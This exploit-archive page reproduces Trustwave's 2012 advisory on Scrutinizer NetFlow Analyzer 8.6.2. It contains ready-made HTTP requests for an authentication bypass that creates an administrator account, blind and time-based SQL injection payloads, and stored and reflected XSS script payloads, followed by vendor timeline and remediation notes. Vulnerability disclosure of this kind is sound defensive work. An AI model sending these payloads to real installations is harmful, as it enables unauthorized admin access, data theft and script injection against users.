Menu

Search for hundreds of thousands of exploits

"Scrutinizer NetFlow & sFlow Analyzer - Multiple Vulnerabilities"

Author

Exploit author

"Trustwave's SpiderLabs"

Platform

Exploit platform

multiple

Release date

Exploit published date

2012-04-19

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
Trustwave SpiderLabs Security Advisory TWSL2012-008:
Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer

https://www.trustwave.com/spiderlabs/advisories/TWSL2012-008.txt

Published: 04/11/12
Version: 1.0

Vendor: Plixer International (http://www.plixer.com)
Product: Scrutinizer NetFlow and sFlow Analyzer
Version affected:  8.6.2 (8.6.2.16204) confirmed; others may be vulnerable

Product description:
Network analysis tool for monitoring the overall network health and reports
on which hosts, applications, protocols, etc. that are consuming network
bandwidth.

Credit: Tanya Secker of Trustwave SpiderLabs

Finding 1: HTTP Authentication Bypass Vulnerability
CVE: CVE-2012-1258

The Scrutinizer web console provides a form-based login facility, requiring
users to authenticate to gain access to further functionality. A tiered
user access model is also used, where administrative and standard users
have a different selection of permissible functions. Authentication and
authorization is controlled by the cookie-based session management system.
Although this is implemented in a standardized way, the session tokens are
not required to perform privileged functions, such as adding users.

Example:

This request will add a user named "trustwave" with the password of
"trustwave" to the administrative user group.

#Request
GET /cgi-bin/userprefs.cgi?newUser=trustwave&pwd=trustwave&selectedUserGroup=1&= HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 ( .NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
#Response
HTTP/1.1 200 OK
Date: Thu, 17 Nov 2011 10:19:25 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 19

{"new_user_id":"9"}


Finding 2: SQL Injection
CVE: CVE-2012-1259

The Scrutinizer web console is prone to unauthenticated SQL Injection
attacks due to user input not being appropriately validated and passed
directly to the backend.  An attacker could exploit this vulnerability to
attempt to gain access to sensitive information within the database or to
perform other attacks on the system.

Example 1:

These requests/responses below show a blind SQL injection vector, where a
proof of concept is used to return a syntactically correct response from
the server (200 OK) followed by an incorrect one (500 Internal Server
Error).

#Request 1
GET /cgi-bin/scrut_fa_exclusions.cgi?name%3anew28%3a28=on&name%3anew7%3a7=on&name%3anew27%3a27=on&name%3anew13%3a13=on&standalone=&name%3anew5%3a5=on&name%3anew14%3a14=on&name%3anew9%3a9=on&user_id=&name%3anew23%3a23=on&name%3anew17%3a17=on&name%3anew11%3a11=on&name%3anew24%3a24=on&addip=')%20AND%20('a'='a&name%3anew18%3a18=on&name%3anew21%3a21=on&name%3anew19%3a19=on&name%3anew22%3a22=on&nbaupdate=1&name%3anew12%3a12=on&name%3anew25%3a25=on&name%3anew2%3a2=on&name%3anew1%3a1=on&name%3anew10%3a10=on&name%3anew15%3a15=on&name%3anew26%3a26=on&name%3anew4%3a4=on&name%3anew6%3a6=on HTTP/1.1
Host: 127.0.0.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://127.0.0.1/cgi-bin/scrut_fa_exclusions.cgi

#Response 1
HTTP/1.1 200 OK
Date: Tue, 31 Jan 2012 23:51:46 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 230

#Request 2
GET /cgi-bin/scrut_fa_exclusions.cgi?name%3anew28%3a28=on&name%3anew7%3a7=on&name%3anew27%3a27=on&name%3anew13%3a13=on&standalone=&name%3anew5%3a5=on&name%3anew14%3a14=on&name%3anew9%3a9=on&user_id=&name%3anew23%3a23=on&name%3anew17%3a17=on&name%3anew11%3a11=on&name%3anew24%3a24=on&addip=')%20ANffD%20('a'='a&name%3anew18%3a18=on&name%3anew21%3a21=on&name%3anew19%3a19=on&name%3anew22%3a22=on&nbaupdate=1&name%3anew12%3a12=on&name%3anew25%3a25=on&name%3anew2%3a2=on&name%3anew1%3a1=on&name%3anew10%3a10=on&name%3anew15%3a15=on&name%3anew26%3a26=on&name%3anew4%3a4=on&name%3anew6%3a6=on HTTP/1.1
Host: 127.0.0.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://127.0.0.1/cgi-bin/scrut_fa_exclusions.cgi

#Response 2
HTTP/1.1 500 Internal Server Error
Date: Tue, 31 Jan 2012 23:52:18 GMT
Server: Apache
Last-Modified: Fri, 17 Dec 2010 02:01:03 GMT
ETag: "900000001d93e-448-497918ae295c0"
Accept-Ranges: bytes
Content-Length: 1096
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

Example 2:

The "getPermissionsAndPreferences" variable within the following request is
also vulnerable to a blind time-based attack.  The example payload included
will result in the server taking a delay of approximately five seconds
before returning a response.

#Request
http://127.0.0.1/cgi-bin/login.cgi?getPermissionsAndPreferences=1%20AND%20SLEEP(5)&session_id=OyAOiECuFdtRbEBY&nocache=12_13_12_734

Example 3:

It should be noted that the other area referenced below returns SQL errors
when a comment character is introduced into the bolded parameters and may
therefore also indicate that they are vulnerable to SQL injection.  The
below request demonstrates this activity.

#Request
http://127.0.0.1/d4d/alarms.php?loadAlarms=1&user_id=1&step=10&page=0&search_str=test&column=msg&fa_algorithm=all&order=modified_ts


Finding 3: Persistent Cross-site Scripting
CVE: CVE-2012-1260

The Scrutinizer web console stores unmodified user-supplied parameters
within its database.  No input validation or character encoding is
performed, resulting in the possibility of client-supplied variables
forming aspects of page content in such a way as to affect the syntax of
the HTML content.

Example:

The below requests/response demonstrate how an attacker could use this to
implant arbitrary Javascript via the "newUser" parameter.

#Request 1
GET /cgi-bin/userprefs.cgi?newUser=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&pwd=guest2&selectedUserGroup=1&= HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 ( .NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Content-Length: 6

Accessing the "Admin" Panel using the below URL results in the stored
JavaScript executing in the browser. It is noted that due to the previous
flaw documented above this may also be executed unauthenticated and results
in the disclosure of all user group names and IDs, along with all usernames
and userids stored in the application. This is achieved via the following
URL:

#Request 2
http://127.0.0.1/cgi-bin/userprefs.cgi?menu=1&nocache=5_26_33_895

#Response 2
HTTP/1.1 200 OK
Date: Thu, 17 Nov 2011 10:40:34 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 276

{"groups":[{"name":"<script>alert(2)</script>","id":"4"},{"name":"<script>alert(document.cookie)</script>","id":"3"},{"name":"Administrators","id":"1"},{"name":"Guests","id":"2"}],"users":[{"name":"\"><script>alert(1)</script>","user_id":"12"},{"name":"admin","user_id":"1"}]}


Finding 4: Reflected Cross-site Scripting
CVE: CVE-2012-1261

The Scrutinizer web console suffers from a Cross Site Scripting
vulnerability in the 'standalone' variable of the
'cgi-bin/scrut_fa_exclusions.cgi' page.  No input validation or character
encoding is performed, resulting in the possibility of client-supplied
variables forming aspects of page content in such a way as to affect the
syntax of the HTML content.

Example:

The below request demonstrates the reflective cross-site scripting
vulnerability by supplying arbitrary JavaScript to the standalone variable.

#Request
GET /cgi-bin/scrut_fa_exclusions.cgi?init=1&standalone="><script>alert('xss')</script> HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 ( .NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://127.0.0.1/cgi-bin/myview.cgi?init=1
Content-Length: 4

Note: Only one example of each vulnerability is provided but the problem is
categorized as "systemic" due to the potential to store or render script
code within multiple similar regions, such as in user group and alarm
areas, respectively.


Vendor Response:
The vendor has declined to comment on these findings. These issues appear
to have been fixed in version 9.0.1.

Remediation Steps:
Plixer International appeared to address all issues in version 9.0.1
(9.0.1.19899).  It is strongly recommended that the latest stable
version is installed.

Additionally, Trustwave SpiderLabs has added rules to the ModSecurity
Commercial Rules Feed for these issues, and Trustwave's vulnerability
scanning solution, TrustKeeper, has been updated to detect all findings.

References
1. http://www.plixer.com
2. http://blog.spiderlabs.com

Vendor Communication Timeline:
2/15/12: Attempted to contact vendor regarding vulnerability
Repeated attempts throughout February and March without response
04/11/12 - Released after confirming fix in version 9.0.1 (9.0.1.19899)

About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.

This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.
Release Date Title Type Platform Author
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
Release Date Title Type Platform Author
2020-12-02 "EgavilanMedia User Registration & Login System with Admin Panel 1.0 - CSRF" webapps multiple "Hardik Solanki"
2020-12-02 "Student Result Management System 1.0 - Authentication Bypass SQL Injection" webapps multiple "Ritesh Gohil"
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Stored Cross Site Scripting" webapps multiple "Soushikta Chowdhury"
Release Date Title Type Platform Author
2018-05-04 "IceWarp Mail Server < 11.1.1 - Directory Traversal" webapps php "Trustwave's SpiderLabs"
2017-01-30 "NETGEAR Routers - Password Disclosure" webapps hardware "Trustwave's SpiderLabs"
2015-08-27 "Oracle GlassFish Server 4.1 - Directory Traversal" webapps multiple "Trustwave's SpiderLabs"
2014-02-12 "Apache Commons FileUpload and Apache Tomcat - Denial of Service" dos multiple "Trustwave's SpiderLabs"
2014-02-11 "Tableau Server < 8.0.7 / < 8.1.2 - Blind SQL Injection" webapps windows "Trustwave's SpiderLabs"
2014-01-24 "Franklin Fueling TS-550 evo 2.0.0.6833 - Multiple Vulnerabilities" webapps hardware "Trustwave's SpiderLabs"
2014-01-24 "Daum Game 1.1.0.5 - ActiveX 'IconCreate Method' Remote Stack Buffer Overflow" remote windows "Trustwave's SpiderLabs"
2013-09-17 "Vino VNC Server 3.7.3 - Persistent Denial of Service" dos linux "Trustwave's SpiderLabs"
2013-09-10 "AjaXplorer 1.0 - Multiple Vulnerabilities" webapps php "Trustwave's SpiderLabs"
2013-08-07 "McAfee SuperScan 4.0 - Cross-Site Scripting" webapps windows "Trustwave's SpiderLabs"
2013-08-02 "MiCasaVerde VeraLite 1.5.408 - Multiple Vulnerabilities" webapps hardware "Trustwave's SpiderLabs"
2013-08-02 "Karotz Smart Rabbit 12.07.19.00 - Multiple Vulnerabilities" local hardware "Trustwave's SpiderLabs"
2013-08-02 "INSTEON Hub 2242-222 - Lack of Web and API Authentication" webapps hardware "Trustwave's SpiderLabs"
2013-01-16 "Oracle Application Framework - Diagnostic Mode Bypass" webapps jsp "Trustwave's SpiderLabs"
2012-10-24 "Bitweaver 2.8.1 - Multiple Vulnerabilities" webapps php "Trustwave's SpiderLabs"
2012-04-19 "Scrutinizer NetFlow & sFlow Analyzer - Multiple Vulnerabilities" webapps multiple "Trustwave's SpiderLabs"
2012-01-25 "WordPress 3.3.1 - Multiple Vulnerabilities" webapps php "Trustwave's SpiderLabs"
2011-06-23 "IBM Web Application Firewall - Bypass" remote windows "Trustwave's SpiderLabs"
2011-02-06 "Comcast DOCSIS 3.0 Business Gateways - Multiple Vulnerabilities" remote hardware "Trustwave's SpiderLabs"
2010-12-12 "Clear iSpot/Clearspot 2.0.0.0 - Cross-Site Request Forgery" webapps hardware "Trustwave's SpiderLabs"
2010-11-13 "Camtron CMNC-200 IP Camera - Authentication Bypass" webapps hardware "Trustwave's SpiderLabs"
2010-11-13 "Camtron CMNC-200 IP Camera - Denial of Service" dos hardware "Trustwave's SpiderLabs"
2010-11-13 "Camtron CMNC-200 IP Camera - ActiveX Buffer Overflow" dos hardware "Trustwave's SpiderLabs"
2010-11-13 "Camtron CMNC-200 IP Camera - Undocumented Default Accounts" webapps hardware "Trustwave's SpiderLabs"
2010-11-13 "Camtron CMNC-200 IP Camera - Directory Traversal" remote hardware "Trustwave's SpiderLabs"
2010-09-24 "FreePBX 2.8.0 - Recordings Interface Allows Remote Code Execution" webapps php "Trustwave's SpiderLabs"
2010-08-03 "EMC Celerra NAS Appliance - Unauthorized Access to Root NFS Export" remote hardware "Trustwave's SpiderLabs"
2009-05-24 "Cisco ASA Appliance 8.x - WebVPN DOM Wrapper Cross-Site Scripting" remote hardware "Trustwave's SpiderLabs"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.